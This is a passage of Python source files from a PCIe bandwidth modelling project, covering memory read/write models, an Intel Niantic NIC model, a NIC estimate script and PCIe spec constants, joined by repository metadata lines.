req_raw_rx_bw = eff_rx_bw * raw_rx_B / float(data_sz)
elif direction & pcie.DIR_TX:
eff_tx_bw = bwspec.tx_bw
eff_rx_bw = 0.0
req_raw_tx_bw = eff_tx_bw * raw_tx_B / float(data_sz)
# how many batches per second?
num_batches = eff_tx_bw / float(data_sz)
# work out rx bandwidth based on batches
req_raw_rx_bw = num_batches * raw_rx_B
elif direction & pcie.DIR_RX:
eff_tx_bw = 0.0
eff_rx_bw = bwspec.rx_bw
num_batches = eff_rx_bw / float(data_sz)
req_raw_tx_bw = num_batches * raw_tx_B
req_raw_rx_bw = eff_rx_bw * raw_rx_B / float(data_sz)
return pcie.BW_Res(req_raw_rx_bw, eff_rx_bw, req_raw_tx_bw, eff_tx_bw)
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,458
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/mem_bw.py
|
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""Simple PCIe memory bandwidth models"""
# pylint: disable=invalid-name
# pylint: disable=too-many-locals
# pylint: disable=unused-variable
import math
from . import pcie
def write(pcicfg, bwspec, size):
"""
Calculate the bandwidth a simple continuous PCIe memory write of
size 'size' will consume given the maximum payload size of 'mps'.
The write requests are broken into up to mps sized chunks and the TLP
header is added. There is no reverse direction traffic.
@param pcicfg PCIe configuration
@param bwspec Bandwidth specification
@param size Size of payload in bytes
"""
data_bytes = size
# compute the number of TLPs
num_tlps = int(math.ceil(float(data_bytes) / float(pcicfg.mps)))
raw_bytes = (num_tlps * pcicfg.TLP_MWr_Hdr_Sz) + data_bytes
if bwspec.type == pcie.BW_Spec.BW_RAW:
raw_bw = bwspec.tx_bw
eff_bw = float(data_bytes) * raw_bw / float(raw_bytes)
else:
eff_bw = bwspec.tx_bw
raw_bw = float(raw_bytes) * eff_bw / float(data_bytes)
return pcie.BW_Res(0.0, 0.0, raw_bw, eff_bw)
def read(pcicfg, bwspec, size):
"""
Calculate the bandwidth a simple continuous PCIe memory read of
size 'size' will consume given the maximum payload size of 'mps'.
PCIe memory reads require bandwidth in both directions: TX for sending
requests and RX for receiving the data (PCIe Completions with Data).
avail_??_bw is assumed to be of the same type for both RX and TX
The read data is broken up into M PCIe completions with data
transactions. Typically the first completion will align to Read
Completion Boundary (RCB) and remaining completions will be
multiples of RCB till the last completion.
For simplicity we assume that read requests are aligned to
boundaries. Depending on 'rcb_chunks' we break the completion in
RCB sized chunks or MPS sized chunks. RCB sized chunks have been
observed on several older chipsets.
@param pcicfg PCIe configuration
@param bwspec Bandwidth specification
@param size Size of payload in bytes
"""
dat_rx_B = size
dat_tx_B = 0 # no data transmitted
# Size of the read request. A request might have to be broken into
# several requests according to MRRS.
tx_num_tlps = int(math.ceil(float(dat_rx_B) / float(pcicfg.mrrs)))
raw_tx_B = tx_num_tlps * pcicfg.TLP_MRd_Hdr_Sz
# Size of the completion with data chopped up
if pcicfg.rcb_chunks:
rx_num_tlps = int(math.ceil(float(dat_rx_B) / float(pcicfg.rcb)))
else:
rx_num_tlps = int(math.ceil(float(dat_rx_B) / float(pcicfg.mps)))
raw_rx_B = (rx_num_tlps * pcicfg.TLP_CplD_Hdr_Sz) + dat_rx_B
if bwspec.type == pcie.BW_Spec.BW_RAW:
# this calculation only makes sense if a raw bandwidth has been
# specified. We work out if raw_tx_b fits in the available
# bandwidth. If not, we need to adjust the number of rx blocks...
raw_tx_b = raw_tx_B * 8
raw_rx_b = raw_rx_B * 8
avail_raw_tx_bw_b = bwspec.tx_bw * (10**9)
avail_raw_rx_bw_b = bwspec.rx_bw * (10**9)
# work out how many transactions the RX can cope with
max_trans = avail_raw_rx_bw_b / float(raw_rx_b)
# assume we can support the RX data rate with TX for requests
req_raw_tx_bw_b = max_trans * raw_tx_b
if req_raw_tx_bw_b > avail_raw_tx_bw_b:
# can't send enough requests as we'd run out of TX bandwidth
# Adjust the tx and rx work. Assume TX is maxed out
req_raw_tx_bw_b = avail_raw_tx_bw_b
# number of read requests we can support
max_trans = req_raw_tx_bw_b / float(raw_tx_b)
# work out new rx bandwidth
req_raw_rx_bw_b = max_trans * raw_rx_b
else:
# we are maxed out on RX, so just use the tlp_bw
req_raw_rx_bw_b = avail_raw_rx_bw_b
req_raw_tx_bw = req_raw_tx_bw_b / float(10**9)
req_raw_rx_bw = req_raw_rx_bw_b / float(10**9)
eff_tx_bw = float(dat_tx_B) * req_raw_tx_bw / float(raw_tx_B) # = 0
eff_rx_bw = float(dat_rx_B) * req_raw_rx_bw / float(raw_rx_B)
else: # BW_EFF
if not bwspec.tx_bw == 0:
print("Effective TX BW for reads is always 0")
bwspec.tx_bw = 0
eff_tx_bw = bwspec.tx_bw
eff_rx_bw = bwspec.rx_bw
return pcie.BW_Res(req_raw_rx_bw, eff_rx_bw, req_raw_tx_bw, eff_tx_bw)
def read_write(pcicfg, bwspec, size):
"""
PCIe read and writes at the same time. read should impact write
Assume symmetric read and writes,
@param pcicfg PCIe configuration
@param bwspec Bandwidth specification
@param size Size of payload in bytes
"""
data_bytes = size
# Write bytes
wr_rx_data_B = 0 # bytes for Writes received by the device
wr_tx_data_B = 0 # bytes for Writes transmitted by the device
wr_tx_num_tlps = int(math.ceil(float(data_bytes) / float(pcicfg.mps)))
wr_rx_num_tlps = 0 # no TLPs our way for reads
wr_tx_data_B = (wr_tx_num_tlps * pcicfg.TLP_MWr_Hdr_Sz) + data_bytes
# Read bytes
rd_rx_data_B = 0 # bytes for Reads received by the device
rd_tx_data_B = 0 # bytes for Reads transmitted by the device
# Size of the read request. A request might have to be broken into
# several requests according to MRRS.
rd_tx_num_tlps = int(math.ceil(float(data_bytes) / float(pcicfg.mrrs)))
rd_tx_data_B = rd_tx_num_tlps * pcicfg.TLP_MRd_Hdr_Sz
# Size of the completion with data chopped up
if pcicfg.rcb_chunks:
rd_rx_num_tlps = int(math.ceil(float(data_bytes) / float(pcicfg.rcb)))
else:
rd_rx_num_tlps = int(math.ceil(float(data_bytes) / float(pcicfg.mps)))
rd_rx_data_B = (rd_rx_num_tlps * pcicfg.TLP_CplD_Hdr_Sz) + data_bytes
# we now have number of RAW bytes transferred in each direction for
# both read and write requests
# Work out overall bytes in each direction per transaction
raw_rx_B = 0
raw_tx_B = 0
raw_rx_B += wr_rx_data_B
raw_rx_B += rd_rx_data_B
raw_tx_B += wr_tx_data_B
raw_tx_B += rd_tx_data_B
eff_data = data_bytes
if bwspec.type == pcie.BW_Spec.BW_RAW:
# We have been given available raw BW in each direction.
# Reads requires BW in both direction. Writes only require BW in one
# direction.
raw_tx_b = raw_tx_B * 8
raw_rx_b = raw_rx_B * 8
avail_raw_tx_bw_b = bwspec.tx_bw * (10**9)
avail_raw_rx_bw_b = bwspec.rx_bw * (10**9)
# work out how many Read transactions the RX avail BW can support
max_rd_trans = avail_raw_rx_bw_b / float(raw_rx_b)
# assume the TX BW can support Read requests and Write data
req_raw_tx_bw_b = max_rd_trans * raw_tx_b
if req_raw_tx_bw_b > avail_raw_tx_bw_b:
# Ran out of TX BW
# Adjust the tx and rx work. Assume TX is maxed out
req_raw_tx_bw_b = avail_raw_tx_bw_b
# number of read requests we can support
max_rd_trans = req_raw_tx_bw_b / float(raw_tx_b)
# work out new rx bandwidth
req_raw_rx_bw_b = max_rd_trans * raw_rx_b
else:
# we are maxed out on RX, so just use all of the avail rx BW
req_raw_rx_bw_b = avail_raw_rx_bw_b
req_raw_tx_bw = req_raw_tx_bw_b / float(10**9)
req_raw_rx_bw = req_raw_rx_bw_b / float(10**9)
eff_tx_bw = eff_data * req_raw_tx_bw / float(raw_tx_B)
eff_rx_bw = eff_data * req_raw_rx_bw / float(raw_rx_B)
else: # BW_EFF
eff_tx_bw = bwspec.tx_bw
eff_rx_bw = bwspec.rx_bw
req_raw_tx_bw = eff_tx_bw * raw_tx_B / float(eff_data)
req_raw_rx_bw = eff_rx_bw * raw_rx_B / float(eff_data)
return pcie.BW_Res(req_raw_rx_bw, eff_rx_bw, req_raw_tx_bw, eff_tx_bw)
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,459
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/niantic.py
|
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""A model for a Intel Niantic 10G NIC"""
# pylint: disable=invalid-name
# pylint: disable=bad-whitespace
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
# pylint: disable=too-many-statements
import math
from . import pcie
from . import util
def bw(pcicfg, bwspec, direction, pkt_size, irq_mod=32, h_opt=None):
"""
This code estimates the PCIe bandwidth requirements for a device
which looks very much like a Intel Niantic NIC.
@param pcicfg PCIe configuration
@param bwspec Bandwidth specification
@param pkt_size Size of the Ethernet frame (subtract 4 to calculate
with FCS stripping)
@param irq_mod Controls interrupts. IRQ every n packets. 0 no IRQ
@param h_opt Host driver optimisations (see below)
@returns A BW_Res object
The details below are taken from the Intel 82599 10 GbE Controller
Datasheet, specifically, the following sections:
- 1.9.1 Transmit (Tx) Data Flow
- 7.2.1.2 Transmit Path in the 82599
- 7.2.3.4 Transmit Descriptor Fetching
- 7.2.3.2.4 Advanced Transmit Data Descriptor
- 1.9.2 Receive (Rx) Data Flow
- 7.1.6 Advanced Receive Descriptors
- 7.1.7 Receive Descriptor Fetching
Throughout we assume the advanced descriptor format being used.
We further assume that a single RX and TX ring is being used.
TX from the host:
1. Host updates the TX queue tail pointer (PCIe write: rx)
2. Device DMAs descriptor(s) (PCIe read: rx/tx)
3. Device DMAs packet content (PCIe read: rx/tx)
4. Device writes back TX descriptor (PCIe write: tx)
5. Device generates interrupt (PCIe write: tx)
6. Host reads TX queue head pointer (PCIe read: rx/tx)
Note: The device may fetch up to 40 TX descriptors at a time
Note: The device may prefetch TX descriptors if its internal Q
becomes close to empty. We don't model that.
Note: TX descriptor write back (step 4) is optional and can be
batched if TXDCTL[n].WTHRESH is set to non-0. Default on
Linux seems to be 8.
Note: There is an optional head pointer write back which disables
TX descriptor right back. This is enable via
TDWBAL[n].Head_WB_En and is disabled by default on Linux.
Note: All descriptors are 128bit
Note: The linux driver updates the TX tail pointer on every packet
RX to the host:
1. Host updates RX Queue Tail Pointer -> free buf (PCIe write: rx)
2. Device DMAs descriptor from host (PCIe read: rx/tx)
3. Device DMAs packet to host (PCIe write: tx)
4. Device writes back RX descriptor (PCIe write: tx)
5. Device generates interrupt (PCIe write: tx)
6. Host reads RX queue head pointer (PCIe read: rx/tx)
Note: By default the Ethernet FCS is stripped before transmitting
to the host. HLREG0.RXCRCSTRP. We leave it up to the caller to
determine if the FCS should be stripped.
Note: Niantic does not pre-fetch freelist descriptors. They are
fetched on demand, when needed.
Note: Niantic does not seem to be doing any batching of RX
descriptor write-back unless descriptors belong to the same
packet (e.g. RSC).
Note: All descriptors are 128bit
The default configuration is based on the Linux kernel ixgbe
driver and how it sets up and uses the NIC. The DPDK poll mode
driver uses interacts with the device slightly different.
Specifically:
- TX: Steps 5 and 6 are omitted. No interrupts are generated on
transmit and the TX Descriptor Done is checked to free
transmitted buffers. TX descriptors are enqueue in batches of 32
- RX: Steps 5 and 6 are omitted. No interrupts are generated on
receive and the RX Descriptor Done is checked to new packets.
To enable these optimisations set @h_opt="PMD"
"""
tx_desc_sz = 16
tx_desc_wb_sz = 16
rx_desc_sz = 16
rx_desc_wb_sz = 16
ptr_sz = 4
# Niantic can prefetch up to 40 descriptors and write back batches of 8
d_tx_batch = 40
d_tx_batch_wb = 8
# Assumptions about what the host is doing: Update the TX pointer
# every @h_tx_batch packets. En-queue @h_fl_batch free buffers at
# a time and update the RX head pointer every @h_rx_batch
h_tx_batch = 1
h_fl_batch = 32
h_rx_batch = 8
if h_opt == "PMD":
h_tx_batch = 32
irq_mod = 0
# work out batch size and multiplier for different tasks
batch_mul = util.low_com_mul(h_fl_batch, d_tx_batch)
d_tx_batch_mul = batch_mul / d_tx_batch
d_tx_batch_wb_mul = batch_mul / d_tx_batch_wb
h_tx_batch_mul = batch_mul / h_tx_batch
h_fl_batch_mul = batch_mul / h_fl_batch
h_rx_batch_mul = batch_mul / h_rx_batch
if irq_mod > 0:
irq_mul = batch_mul / irq_mod
else:
irq_mul = 0
# stash the packet size away
data_B = pkt_size
if not direction & pcie.DIR_BOTH:
raise Exception("Unknown Direction %d" % direction)
# XXX add a check that the batch reads/writes of descriptors do not
# exceed MPS, MRRS, RCB. It is not handled in this code...
# Packet TX
tx_rx_data_B = 0 # bytes for TX received by the device
tx_tx_data_B = 0 # bytes for TX transmitted by the device
# H: tail pointer write (once per h_tx_batch)
tx_rx_data_B += (ptr_sz + pcicfg.TLP_MWr_Hdr_Sz) * h_tx_batch_mul
# D: read descriptor (once per d_tx_batch)
_rd_sz = tx_desc_sz * d_tx_batch
tlps = int(math.ceil(float(_rd_sz) / float(pcicfg.mrrs)))
tx_tx_data_B += (tlps * pcicfg.TLP_MRd_Hdr_Sz) * d_tx_batch_mul
if pcicfg.rcb_chunks:
tlps = int(math.ceil(float(_rd_sz) / float(pcicfg.rcb)))
else:
tlps = int(math.ceil(float(_rd_sz) / float(pcicfg.mps)))
tx_rx_data_B += ((tlps * pcicfg.TLP_CplD_Hdr_Sz) + _rd_sz) * d_tx_batch_mul
# D: data DMA reads (For each packet)
tlps = int(math.ceil(float(data_B) / float(pcicfg.mrrs)))
tx_tx_data_B += (tlps * pcicfg.TLP_MRd_Hdr_Sz) * batch_mul
if pcicfg.rcb_chunks:
tlps = int(math.ceil(float(data_B) / float(pcicfg.rcb)))
else:
tlps = int(math.ceil(float(data_B) / float(pcicfg.mps)))
tx_rx_data_B += ((tlps * pcicfg.TLP_CplD_Hdr_Sz) + data_B) * batch_mul
# D: Write back descriptors (once per d_tx_batch_wb)
_wr_sz = tx_desc_wb_sz * d_tx_batch_wb
tlps = int(math.ceil(float(_wr_sz)/float(pcicfg.mps)))
tx_tx_data_B += ((tlps * pcicfg.TLP_MWr_Hdr_Sz) + _wr_sz) *d_tx_batch_wb_mul
if not h_opt == "PMD":
# D: send IRQ (depending on setting)
tx_tx_data_B += (pcie.MSI_SIZE + pcicfg.TLP_MWr_Hdr_Sz) * irq_mul
# H: read head pointer (once per h_tx_batch)
tx_rx_data_B += pcicfg.TLP_MRd_Hdr_Sz * h_tx_batch_mul
tx_tx_data_B += (ptr_sz + pcicfg.TLP_CplD_Hdr_Sz) * h_tx_batch_mul
# done
# Packet RX
rx_rx_data_B = 0 # bytes for RX received by the device
rx_tx_data_B = 0 # bytes for RX transmitted by the device
# H: tail pointer write (once per h_fl_batch)
rx_rx_data_B += (ptr_sz + pcicfg.TLP_MWr_Hdr_Sz) * h_fl_batch_mul
# D: read descriptors (For each packet)
rx_tx_data_B += pcicfg.TLP_MRd_Hdr_Sz * batch_mul
rx_rx_data_B += (rx_desc_sz + pcicfg.TLP_CplD_Hdr_Sz) * batch_mul
# D: DMA write (For each packet)
tlps = int(math.ceil(float(data_B) / float(pcicfg.mps)))
rx_tx_data_B = ((tlps * pcicfg.TLP_MWr_Hdr_Sz) + data_B) * batch_mul
# D: Write back descriptors (For each packet)
rx_tx_data_B += (rx_desc_wb_sz + pcicfg.TLP_MWr_Hdr_Sz) * batch_mul
if not h_opt == "PMD":
# D: send IRQ (Depending on setting)
rx_tx_data_B += (pcie.MSI_SIZE + pcicfg.TLP_MWr_Hdr_Sz) * irq_mul
# H: read head pointer (once per packet)
rx_rx_data_B += pcicfg.TLP_MRd_Hdr_Sz * h_rx_batch_mul
rx_tx_data_B += (ptr_sz + pcicfg.TLP_CplD_Hdr_Sz) * h_rx_batch_mul
# done
# we now know how many bytes are transfered in each direction for
# both RX and TX for a batch. Lets work out how much we can transfer etc.
return util.gen_res(bwspec, direction, data_B * batch_mul,
tx_rx_data_B, tx_tx_data_B, rx_rx_data_B, rx_tx_data_B)
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,460
|
pcie-bench/pcie-model
|
refs/heads/master
|
/nic_bw.py
|
#! /usr/bin/env python3
#
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""A script to generate performance estimates for NICs"""
import sys
from model import pcie, eth, mem_bw, simple_nic, niantic
# pylint: disable=bad-whitespace
# pylint: disable=too-many-locals
def main():
"""main"""
cfg = pcie.Cfg(version='gen3',
lanes='x8',
addr=64,
ecrc=0,
mps=256,
mrrs=512,
rcb=64)
ethcfg = eth.Cfg('40GigE')
tlp_bw = cfg.TLP_bw
bw_spec = pcie.BW_Spec(tlp_bw, tlp_bw, pcie.BW_Spec.BW_RAW)
dat = open("nic_bw.dat", "w")
dat.write("\"Packet Size(Bytes)\" "
"\"Max. Write Bandwidth\" "
"\"Max. R/W Bandwidth\" "
"\"40Gb/s Line Rate (- FCS)\" "
"\"Simplistic NIC Bi-directional\" "
"\"Simplistic NIC TX only\" "
"\"Simplistic NIC RX only\" "
"\"kernel NIC Bi-directional\" "
"\"kernel NIC TX only\" "
"\"kernel NIC RX only\" "
"\"DPDK NIC Bi-directional\" "
"\"DPDK NIC TX only\" "
"\"DPDK NIC RX only\" "
"\n")
max_val = 0
for size in range(64, 1500):
w_bw = mem_bw.write(cfg, bw_spec, size - 4)
rw_bw = mem_bw.read(cfg, bw_spec, size - 4)
# Work out Ethernet bandwidth. Typically do not transfer the FCS
eth_bw = ethcfg.bps_ex(size - 4) / (1000 * 1000 * 1000.0)
# Remember NIC RX is DIR_TX
simple_nic_bi = simple_nic.bw(cfg, bw_spec, pcie.DIR_BOTH, size - 4)
simple_nic_tx = simple_nic.bw(cfg, bw_spec, pcie.DIR_RX, size - 4)
simple_nic_rx = simple_nic.bw(cfg, bw_spec, pcie.DIR_TX, size - 4)
kernel_nic_bi = niantic.bw(cfg, bw_spec, pcie.DIR_BOTH, size - 4)
kernel_nic_tx = niantic.bw(cfg, bw_spec, pcie.DIR_RX, size - 4)
kernel_nic_rx = niantic.bw(cfg, bw_spec, pcie.DIR_TX, size - 4)
pmd_nic_bi = niantic.bw(cfg, bw_spec, pcie.DIR_BOTH, size - 4, h_opt="PMD")
pmd_nic_tx = niantic.bw(cfg, bw_spec, pcie.DIR_RX, size - 4, h_opt="PMD")
pmd_nic_rx = niantic.bw(cfg, bw_spec, pcie.DIR_TX, size - 4, h_opt="PMD")
max_val = max(max_val, rw_bw.rx_eff, eth_bw,
simple_nic_bi.tx_eff, simple_nic_tx.rx_eff, simple_nic_rx.tx_eff,
kernel_nic_bi.tx_eff, kernel_nic_tx.rx_eff, kernel_nic_rx.tx_eff,
pmd_nic_bi.tx_eff, pmd_nic_tx.rx_eff, pmd_nic_rx.tx_eff)
dat.write("%d %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f\n" %
(size, w_bw.tx_eff, rw_bw.rx_eff,
eth_bw,
simple_nic_bi.tx_eff, simple_nic_tx.rx_eff, simple_nic_rx.tx_eff,
kernel_nic_bi.tx_eff, kernel_nic_tx.rx_eff, kernel_nic_rx.tx_eff,
pmd_nic_bi.tx_eff, pmd_nic_tx.rx_eff, pmd_nic_rx.tx_eff
))
dat.close()
if __name__ == '__main__':
sys.exit(main())
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,461
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/pcie.py
|
## Copyright (C) 2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""General definitions for PCIe bandwidth calculations"""
# pylint: disable=invalid-name
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-arguments
# pylint: disable=too-few-public-methods
##
## General PCIe variables from the Spec
##
Vers = ['gen1', 'gen2', 'gen3', 'gen4', 'gen5']
Laness = ['x1', 'x2', 'x4', 'x8', 'x16', 'x32']
Laness_mul = [1, 2, 4, 8, 16, 32]
# Transactions per second
GTs = {'gen1' : 2.5,
'gen2' : 5.0,
'gen3' : 8.0,
'gen4' : 16.0,
'gen5' : 32.0}
# Either 8b/10b or 128b/130b symbol encoding
Gbs = {}
for ver in GTs.keys():
if GTs[ver] >= 8.0:
Gbs[ver] = (128.0/130.0) * GTs[ver]
else:
Gbs[ver] = (8.0/10.0) * GTs[ver]
# Raw bandwidth Gbs * Lanes
Raw = {}
for ver in Vers:
for lanes in Laness:
if not ver in Raw:
Raw[ver] = {}
Raw[ver][lanes] = Gbs[ver] * \
Laness_mul[Laness.index(lanes)]
# Maximum Payload Size
MPSs = [128, 256, 512, 1024, 2048, 4096]
# Maximum Read Request Sizes
MRRSs = [128, 256, 512, 1024, 2048, 4096]
# Read Completion Boundaries
RCBs = [64, 128, 256, 512]
# FC Update Rate,
# see PCIe Base Spec rev 5.0 Table 2-46, 2-47, and 2-48
FC_Size = 8 # 2 B Phys + 4 B DLLP + 2B DLLP CRC
FC_Guide = {
'gen1' : {
'x1' : {128: 237, 256: 416, 512: 559, 1024: 1071, 2048: 2095, 4096: 4143},
'x2' : {128: 128, 256: 217, 512: 289, 1024: 545, 2048: 1057, 4096: 2081},
'x4' : {128: 73, 256: 118, 512: 154, 1024: 282, 2048: 538, 4096: 1050},
'x8' : {128: 67, 256: 107, 512: 86, 1024: 150, 2048: 278, 4096: 534},
'x16' : {128: 48, 256: 72, 512: 86, 1024: 150, 2048: 278, 4096: 534},
'x32' : {128: 33, 256: 45, 512: 52, 1024: 84, 2048: 248, 4096: 276},
},
'gen2' : {
'x1' : {128: 288, 256: 467, 512: 610, 1024: 1122, 2048: 2146, 4096: 4194},
'x2' : {128: 179, 256: 268, 512: 340, 1024: 596, 2048: 1108, 4096: 2132},
'x4' : {128: 124, 256: 169, 512: 205, 1024: 333, 2048: 589, 4096: 1101},
'x8' : {128: 118, 256: 158, 512: 137, 1024: 201, 2048: 329, 4096: 585},
'x16' : {128: 99, 256: 123, 512: 137, 1024: 201, 2048: 329, 4096: 585},
'x32' : {128: 84, 256: 96, 512: 103, 1024: 135, 2048: 199, 4096: 327},
},
'gen3' : {
'x1' : {128: 333, 256: 512, 512: 655, 1024: 1167, 2048: 2191, 4096: 4239},
'x2' : {128: 224, 256: 313, 512: 385, 1024: 641, 2048: 1153, 4096: 2177},
'x4' : {128: 169, 256: 214, 512: 250, 1024: 378, 2048: 634, 4096: 1146},
'x8' : {128: 163, 256: 203, 512: 182, 1024: 246, 2048: 374, 4096: 630},
'x16' : {128: 144, 256: 168, 512: 182, 1024: 246, 2048: 374, 4096: 630},
'x32' : {128: 129, 256: 141, 512: 148, 1024: 180, 2048: 244, 4096: 372},
},
'gen4' : {
'x1' : {128: 333, 256: 512, 512: 655, 1024: 1167, 2048: 2191, 4096: 4239},
'x2' : {128: 224, 256: 313, 512: 385, 1024: 641, 2048: 1153, 4096: 2177},
'x4' : {128: 169, 256: 214, 512: 250, 1024: 378, 2048: 634, 4096: 1146},
'x8' : {128: 163, 256: 203, 512: 182, 1024: 246, 2048: 374, 4096: 630},
'x16' : {128: 144, 256: 168, 512: 182, 1024: 246, 2048: 374, 4096: 630},
'x32' : {128: 129, 256: 141, 512: 148, 1024: 180, 2048: 244, 4096: 372},
},
'gen5' : {
'x1' : {128: 333, 256: 512, 512: 655, 1024: 1167, 2048: 2191, 4096: 4239},
'x2' : {128: 224, 256: 313, 512: 385, 1024: 641, 2048: 1153, 4096: 2177},
'x4' : {128: 169, 256: 214, 512: 250, 1024: 378, 2048: 634, 4096: 1146},
'x8' : {128: 163, 256: 203, 512: 182, 1024: 246, 2048: 374, 4096: 630},
'x16' : {128: 144, 256: 168, 512: 182, 1024: 246, 2048: 374, 4096: 630},
'x32' : {128: 129, 256: 141, 512: 148, 1024: 180, 2048: 244, 4096: 372},
},
}
# Ack Limit,
# see PCIe Base Spec rev 5.0 Table 3-7, 3-8, and 3-9
Ack_Size = 8 # 2 B Phys + 4 B DLLP + 2B DLLP CRC
Ack_Limits = {
'gen1' : {
'x1' : {128: 237, 256: 416, 512: 559, 1024: 1071, 2048: 2095, 4096: 4143},
'x2' : {128: 128, 256: 217, 512: 289, 1024: 545, 2048: 1057, 4096: 2081},
'x4' : {128: 73, 256: 118, 512: 154, 1024: 282, 2048: 538, 4096: 1050},
'x8' : {128: 67, 256: 107, 512: 86, 1024: 150, 2048: 278, 4096: 534},
'x16' : {128: 48, 256: 72, 512: 86, 1024: 150, 2048: 278, 4096: 534},
'x32' : {128: 33, 256: 45, 512: 52, 1024: 84, 2048: 148, 4096: 276},
},
'gen2' : {
'x1' : {128: 288, 256: 467, 512: 610, 1024: 1122, 2048: 2146, 4096: 4194},
'x2' : {128: 179, 256: 268, 512: 340, 1024: 596, 2048: 1108, 4096: 2132},
'x4' : {128: 124, 256: 169, 512: 205, 1024: 333, 2048: 589, 4096: 1101},
'x8' : {128: 118, 256: 158, 512: 137, 1024: 201, 2048: 329, 4096: 585},
'x16' : {128: 99, 256: 123, 512: 137, 1024: 201, 2048: 329, 4096: 585},
'x32' : {128: 84, 256: 96, 512: 103, 1024: 135, 2048: 199, 4096: 237},
},
'gen3' : {
'x1' : {128: 333, 256: 512, 512: 655, 1024: 1167, 2048: 2191, 4096: 4239},
'x2' : {128: 224, 256: 313, 512: 385, 1024: 641, 2048: 1153, 4096: 2177},
'x4' : {128: 169, 256: 214, 512: 250, 1024: 378, 2048: 634, 4096: 1146},
'x8' : {128: 163, 256: 203, 512: 182, 1024: 246, 2048: 374, 4096: 630},
'x16' : {128: 144, 256: 168, 512: 182, 1024: 246, 2048: 374, 4096: 630},
'x32' : {128: 129, 256: 141, 512: 148, 1024: 180, 2048: 244, 4096: 372},
},
'gen4' : {
'x1' : {128: 333, 256: 512, 512: 655, 1024: 1167, 2048: 2191, 4096: 4239},
'x2' : {128: 224, 256: 313, 512: 385, 1024: 641, 2048: 1153, 4096: 2177},
'x4' : {128: 169, 256: 214, 512: 250, 1024: 378, 2048: 634, 4096: 1146},
'x8' : {128: 163, 256: 203, 512: 182, 1024: 246, 2048: 374, 4096: 630},
'x16' : {128: 144, 256: 168, 512: 182, 1024: 246, 2048: 374, 4096: 630},
'x32' : {128: 129, 256: 141, 512: 148, 1024: 180, 2048: 244, 4096: 372},
},
'gen5' : {
'x1' : {128: 333, 256: 512, 512: 655, 1024: 1167, 2048: 2191, 4096: 4239},
'x2' : {128: 224, 256: 313, 512: 385, 1024: 641, 2048: 1153, 4096: 2177},
'x4' : {128: 169, 256: 214, 512: 250, 1024: 378, 2048: 634, 4096: 1146},
'x8' : {128: 163, 256: 203, 512: 182, 1024: 246, 2048: 374, 4096: 630},
'x16' : {128: 144, 256: 168, 512: 182, 1024: 246, 2048: 374, 4096: 630},
'x32' : {128: 129, 256: 141, 512: 148, 1024: 180, 2048: 244, 4096: 372},
},
}
# SKIP ordered sets for clock compensation (inserted on all lanes)
SKIP_Interval = 1538
SKIP_Length = 4
# DLLP header (6 bytes) plus start and end symbol at Phys layer
DLLP_Hdr = 8
# Maximum Bandwidth usable at TLP layer. This takes into account the
# recommended rates for ACKs and FC updates as per spec as well as the SKIP
# ordered sets for clock compensation. The Bandwidth can be further reduced
# due to bit errors or different chipset configurations
TLP_bw = {}
for ver in Vers:
for lanes in Laness:
for mps in MPSs:
